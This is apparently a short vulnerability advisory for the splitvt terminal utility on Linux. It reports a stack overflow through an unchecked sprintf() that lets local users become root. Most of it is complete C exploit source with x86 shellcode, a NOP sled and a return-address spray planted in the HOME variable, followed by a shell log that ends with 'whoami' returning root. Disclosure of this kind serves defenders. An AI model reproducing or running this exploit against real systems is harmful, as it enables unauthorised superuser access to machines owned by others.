COMMAND

    splitvt(1)

SYSTEMS AFFECTED

    Linux 2-3.X

PROBLEM

    Local users can obtain superuser privelages.

    Bug Synopsis: A  stack overflow exists  via user defined  unbounds
    checked user supplied data sent to a sprintf().

    crimson~$ cc -o sp sp.c
    crimson~$ sp
    bash$ sp
    bash$ splitvt
    bash# whoami
    root

----------------------------------------------------------------------------
long get_esp(void)
{
__asm__("movl %esp,%eax\n");
}
main()
{
  char eggplant[2048];
  int a;
  char *egg;
  long *egg2;
  char realegg[] =
"\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f"
"\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd"
"\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh";
  char *eggie = realegg;

  egg = eggplant;

  *(egg++) = 'H';
  *(egg++) = 'O';
  *(egg++) = 'M';
  *(egg++) = 'E';
  *(egg++) = '=';

  egg2 = (long *)egg;

  for (a=0;a<(256+8)/4;a++) *(egg2++) = get_esp() + 0x3d0 + 0x30;

  egg=(char *)egg2;

  for (a=0;a<0x40;a++) *(egg++) = 0x90;

  while (*eggie)
    *(egg++) = *(eggie++);
  *egg = 0; /* terminate eggplant! */

  putenv(eggplant);

  system("/bin/bash");
}
----------------------------------------------------------------------------